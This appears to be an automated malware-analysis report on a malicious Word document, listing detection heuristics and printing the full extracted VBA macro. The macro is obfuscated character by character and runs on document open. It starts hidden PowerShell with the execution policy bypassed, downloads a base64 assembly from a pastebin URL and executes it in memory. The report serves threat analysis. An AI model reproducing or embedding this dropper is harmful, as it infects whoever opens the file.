MALICIOUS
150
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro that executes a PowerShell command. This command is designed to download and execute a second-stage payload from a remote URL, bypassing execution policy and hiding its activity. The macro's use of CreateObject and CallByName, along with the Document_Open auto-execution, strongly indicates malicious intent.
Heuristics 6
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set X = CreateObject(cmdALL) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName X, rALL, VbMethod, (ALL & pALL), vbHide -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7948 bytes |
SHA-256: 8fb3af443b3fefbd77543676546511a756c4103aa004dd392bc9635e3decb4f3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim A0
A0 = "p"
Dim A1
A1 = "o"
Dim A2
A2 = "w"
Dim A3
A3 = "e"
Dim A4
A4 = "r"
Dim A5
A5 = "s"
Dim A6
A6 = "h"
Dim A7
A7 = "e"
Dim A8
A8 = "l"
Dim A9
A9 = "l"
Dim A10
A10 = "."
Dim A11
A11 = "e"
Dim A12
A12 = "x"
Dim A13
A13 = "e"
Dim A14
A14 = " "
Dim A15
A15 = "-"
Dim A16
A16 = "n"
Dim A17
A17 = "o"
Dim A18
A18 = "e"
Dim A19
A19 = "x"
Dim A20
A20 = "i"
Dim A21
A21 = "t"
Dim A22
A22 = " "
Dim A23
A23 = "-"
Dim A24
A24 = "E"
Dim A25
A25 = "x"
Dim A26
A26 = "e"
Dim A27
A27 = "c"
Dim A28
A28 = "u"
Dim A29
A29 = "t"
Dim A30
A30 = "i"
Dim A31
A31 = "o"
Dim A32
A32 = "n"
Dim A33
A33 = "P"
Dim A34
A34 = "o"
Dim A35
A35 = "l"
Dim A36
A36 = "i"
Dim A37
A37 = "c"
Dim A38
A38 = "y"
Dim A39
A39 = " "
Dim A40
A40 = "B"
Dim A41
A41 = "y"
Dim A42
A42 = "p"
Dim A43
A43 = "a"
Dim A44
A44 = "s"
Dim A45
A45 = "s"
Dim A46
A46 = " "
Dim A47
A47 = "-"
Dim A48
A48 = "w"
Dim A49
A49 = "i"
Dim A50
A50 = "n"
Dim A51
A51 = "d"
Dim A52
A52 = "o"
Dim A53
A53 = "w"
Dim A54
A54 = "s"
Dim A55
A55 = "t"
Dim A56
A56 = "y"
Dim A57
A57 = "l"
Dim A58
A58 = "e"
Dim A59
A59 = " "
Dim A60
A60 = "h"
Dim A61
A61 = "i"
Dim A62
A62 = "d"
Dim A63
A63 = "d"
Dim A64
A64 = "e"
Dim A65
A65 = "n"
Dim A66
A66 = " "
Dim A67
A67 = "-"
Dim A68
A68 = "c"
Dim A69
A69 = "o"
Dim A70
A70 = "m"
Dim A71
A71 = "m"
Dim A72
A72 = "a"
Dim A73
A73 = "n"
Dim A74
A74 = "d"
Dim A75
A75 = " "
Dim ALL
ALL = A0 & A1 & A2 & A3 & A4 & A5 & A6 & A7 & A8 & A9 & A10 & A11 & A12 & A13 & A14 & A15 & A16 & A17 & A18 & A19 & A20 & A21 & A22 & A23 & A24 & A25 & A26 & A27 & A28 & A29 & A30 & A31 & A32 & A33 & A34 & A35 & A36 & A37 & A38 & A39 & A40 & A41 & A42 & A43 & A44 & A45 & A46 & A47 & A48 & A49 & A50 & A51 & A52 & A53 & A54 & A55 & A56 & A57 & A58 & A59 & A60 & A61 & A62 & A63 & A64 & A65 & A66 & A67 & A68 & A69 & A70 & A71 & A72 & A73 & A74 & A75
Dim P0
P0 = "["
Dim P1
P1 = "S"
Dim P2
P2 = "y"
Dim P3
P3 = "s"
Dim P4
P4 = "t"
Dim P5
P5 = "e"
Dim P6
P6 = "m"
Dim P7
P7 = "."
Dim P8
P8 = "R"
Dim P9
P9 = "e"
Dim P10
P10 = "f"
Dim P11
P11 = "l"
Dim P12
P12 = "e"
Dim P13
P13 = "c"
Dim P14
P14 = "t"
Dim P15
P15 = "i"
Dim P16
P16 = "o"
Dim P17
P17 = "n"
Dim P18
P18 = "."
Dim P19
P19 = "A"
Dim P20
P20 = "s"
Dim P21
P21 = "s"
Dim P22
P22 = "e"
Dim P23
P23 = "m"
Dim P24
P24 = "b"
Dim P25
P25 = "l"
Dim P26
P26 = "y"
Dim P27
P27 = "]"
Dim P28
P28 = ":"
Dim P29
P29 = ":"
Dim P30
P30 = "L"
Dim P31
P31 = "o"
Dim P32
P32 = "a"
Dim P33
P33 = "d"
Dim P34
P34 = "("
Dim P35
P35 = "["
Dim P36
P36 = "S"
Dim P37
P37 = "y"
Dim P38
P38 = "s"
Dim P39
P39 = "t"
Dim P40
P40 = "e"
Dim P41
P41 = "m"
Dim P42
P42 = "."
Dim P43
P43 = "C"
Dim P44
P44 = "o"
Dim P45
P45 = "n"
Dim P46
P46 = "v"
Dim P47
P47 = "e"
Dim P48
P48 = "r"
Dim P49
P49 = "t"
Dim P50
P50 = "]"
Dim P51
P51 = ":"
Dim P52
P52 = ":"
Dim P53
P53 = "F"
Dim P54
P54 = "r"
Dim P55
P55 = "o"
Dim P56
P56 = "m"
Dim P57
P57 = "B"
Dim P58
P58 = "a"
Dim P59
P59 = "s"
Dim P60
P60 = "e"
Dim P61
P61 = "6"
Dim P62
P62 = "4"
Dim P63
P63 = "S"
Dim P64
P64 = "t"
Dim P65
P65 = "r"
Dim P66
P66 = "i"
Dim P67
P67 = "n"
Dim P68
P68 = "g"
Dim P69
P69 = "("
Dim P70
P70 = "("
Dim P71
P71 = "N"
Dim P72
P72 = "e"
Dim P73
P73 = "w"
Dim P74
P74 = "-"
Dim P75
P75 = "O"
Dim P76
P76 = "b"
Dim P77
P77 = "j"
Dim P78
P78 = "e"
Dim P79
P79 = "c"
Dim P80
P80 = "t"
Dim P81
P81 = " "
Dim P82
P82 = "S"
Dim P83
P83 = "y"
Dim P84
P84 = "s"
Dim P85
P85 = "t"
Dim P86
P86 = "e"
Dim P87
P87 = "m"
Dim P88
P88 = "."
Dim P89
P89 = "N"
Dim P90
P90 = "e"
Dim P91
P91 = "t"
Dim P92
P92 = "."
Dim P93
P93 = "W"
Dim P94
P94 = "e"
Dim P95
P95 = "b"
Dim P96
P96 = "C"
Dim P97
P97 = "l"
Dim P98
P98 = "i"
Dim P99
P99 = "e"
Dim P100
P100 = "n"
Dim P101
P101 = "t"
Dim P102
P102 = ")"
Dim P103
P103 = "."
Dim P104
P104 = "D"
Dim P105
P105 = "o"
Dim P106
P106 = "w"
Dim P107
P107 = "n"
Dim P108
P108 = "l"
Dim P109
P109 = "o"
Dim P110
P110 = "a"
Dim P111
P111 = "d"
Dim P112
P112 = "S"
Dim P113
P113 = "t"
Dim P114
P114 = "r"
Dim P115
P115 = "i"
Dim P116
P116 = "n"
Dim P117
P117 = "g"
Dim P118
P118 = "("
Dim P119
P119 = "'"
Dim P120
P120 = "h"
Dim P121
P121 = "t"
Dim P122
P122 = "t"
Dim P123
P123 = "p"
Dim P124
P124 = "s"
Dim P125
P125 = ":"
Dim P126
P126 = "/"
Dim P127
P127 = "/"
Dim P128
P128 = "p"
Dim P129
P129 = "a"
Dim P130
P130 = "s"
Dim P131
P131 = "t"
Dim P132
P132 = "e"
Dim P133
P133 = "b"
Dim P134
P134 = "i"
Dim P135
P135 = "n"
Dim P136
P136 = "."
Dim P137
P137 = "c"
Dim P138
P138 = "o"
Dim P139
P139 = "m"
Dim P140
P140 = "/"
Dim P141
P141 = "r"
Dim P142
P142 = "a"
Dim P143
P143 = "w"
Dim P144
P144 = "/"
Dim P145
P145 = "p"
Dim P146
P146 = "w"
Dim P147
P147 = "1"
Dim P148
P148 = "H"
Dim P149
P149 = "t"
Dim P150
P150 = "9"
Dim P151
P151 = "h"
Dim P152
P152 = "R"
Dim P153
P153 = "'"
Dim P154
P154 = ")"
Dim P155
P155 = ")"
Dim P156
P156 = ")"
Dim P157
P157 = "."
Dim P158
P158 = "E"
Dim P159
P159 = "n"
Dim P160
P160 = "t"
Dim P161
P161 = "r"
Dim P162
P162 = "y"
Dim P163
P163 = "P"
Dim P164
P164 = "o"
Dim P165
P165 = "i"
Dim P166
P166 = "n"
Dim P167
P167 = "t"
Dim P168
P168 = "."
Dim P169
P169 = "I"
Dim P170
P170 = "n"
Dim P171
P171 = "v"
Dim P172
P172 = "o"
Dim P173
P173 = "k"
Dim P174
P174 = "e"
Dim P175
P175 = "("
Dim P176
P176 = "$"
Dim P177
P177 = "n"
Dim P178
P178 = "u"
Dim P179
P179 = "l"
Dim P180
P180 = "l"
Dim P181
P181 = ","
Dim P182
P182 = "$"
Dim P183
P183 = "n"
Dim P184
P184 = "u"
Dim P185
P185 = "l"
Dim P186
P186 = "l"
Dim P187
P187 = ")"
Dim pALL
pALL = P0 & P1 & P2 & P3 & P4 & P5 & P6 & P7 & P8 & P9 & P10 & P11 & P12 & P13 & P14 & P15 & P16 & P17 & P18 & P19 & P20 & P21 & P22 & P23 & P24 & P25 & P26 & P27 & P28 & P29 & P30 & P31 & P32 & P33 & P34 & P35 & P36 & P37 & P38 & P39 & P40 & P41 & P42 & P43 & P44 & P45 & P46 & P47 & P48 & P49 & P50 & P51 & P52 & P53 & P54 & P55 & P56 & P57 & P58 & P59 & P60 & P61 & P62 & P63 & P64 & P65 & P66 & P67 & P68 & P69 & P70 & P71 & P72 & P73 & P74 & P75 & P76 & P77 & P78 & P79 & P80 & P81 & P82 & P83 & P84 & P85 & P86 & P87 & P88 & P89 & P90 & P91 & P92 & P93 & P94 & P95 & P96 & P97 & P98 & P99 & P100 & P101 & P102 & P103 & P104 & P105 & P106 & P107 & P108 & P109 & P110 & P111 & P112 & P113 & P114 & P115 & P116 & P117 & P118 & P119 & P120 & P121 & P122 & P123 & P124 & P125 & P126 & P127 & P128 & P129 & P130 & P131 & P132 & P133 & P134 & P135 & P136 & P137 & P138 & P139 & P140 & P141 & P142 & P143 & P144 & P145 & P146 & P147 & P148 & P149 & P150 & P151 & P152 & P153 & P154 & P155 & P156 & P157 & P158 & P159 & P160 _
& P161 & P162 & P163 & P164 & P165 & P166 & P167 & P168 & P169 & P170 & P171 & P172 & P173 & P174 & P175 & P176 & P177 & P178 & P179 & P180 & P181 & P182 & P183 & P184 & P185 & P186 & P187
Dim C0
C0 = "W"
Dim C1
C1 = "s"
Dim C2
C2 = "c"
Dim C3
C3 = "r"
Dim C4
C4 = "i"
Dim C5
C5 = "p"
Dim C6
C6 = "t"
Dim C7
C7 = "."
Dim C8
C8 = "S"
Dim C9
C9 = "h"
Dim C10
C10 = "e"
Dim C11
C11 = "l"
Dim C12
C12 = "l"
Dim cmdALL
cmdALL = C0 & C1 & C2 & C3 & C4 & C5 & C6 & C7 & C8 & C9 & C10 & C11 & C12
Set X = CreateObject(cmdALL)
Dim R0
R0 = "R"
Dim R1
R1 = "u"
Dim R2
R2 = "n"
Dim rALL
rALL = R0 & R1 & R2
CallByName X, rALL, VbMethod, (ALL & pALL), vbHide
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.